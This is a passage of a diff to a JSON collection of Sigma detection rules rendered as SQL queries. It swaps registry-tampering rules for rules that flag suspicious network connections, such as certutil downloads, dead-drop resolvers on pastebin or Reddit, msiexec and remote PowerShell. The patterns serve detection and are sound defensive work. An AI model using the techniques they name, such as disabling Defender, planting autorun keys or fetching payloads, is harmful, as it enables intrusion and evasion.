'%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_new_network_provider.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion" ], 
@@ -32559,4350 +32605,4326 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unknown" + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": 
"976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "id": "480421f9-417f-4d3b-9552-fd2728443ec8", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ 
- "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((NewValue LIKE '(Empty)' ESCAPE '\\' OR NewValue LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname 
LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR 
(NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "RDP Sensitive Settings Changed to Zero", - "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", - "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": 
"registry_set_terminal_server_suspicious.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Wow6432Node Classes Autorun Keys Modification", - "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", + "status": "experimental", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", - "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "title": "Wuauclt Network Connection", + "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of wuauclt.exe over the network." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_wuauclt_network_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Session Manager Autorun Keys Modification", - "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "title": "Msiexec Initiated Connection", + "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + 
"Legitimate msiexec over networks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" + "filename": "net_connection_win_msiexec.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", - "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "title": "Suspicious Non-Browser Network Communication With Reddit API", + "id": "d7b09985-95a3-44be-8450-b6eadf49833e", + "status": "experimental", + "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", + "author": "Gavin Knapp", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.command_and_control", + "attack.t1102" ], "falsepositives": [ - "Unknown" + "Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%reddit.com%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND 
(NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "net_connection_win_reddit_api_non_browser_access.yml" }, { - "title": "Potential Persistence Via Shim Database Modification", - "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "title": "Python Initiated Connection", + "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "status": "experimental", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.011" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Legitimate python script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (NewValue = ''))" + "SELECT * FROM logs WHERE 
((Initiated = 'true' AND NewProcessName LIKE '%python%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" ], - "filename": "registry_set_persistence_shim_databases.yml" + "filename": "net_connection_win_python.yml" }, { - "title": "Disable Exploit Guard Network Protection on Windows Defender", - "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "title": "Script Initiated Connection", + "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "status": "experimental", - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a script interpreter wscript/cscript opening a network connection. 
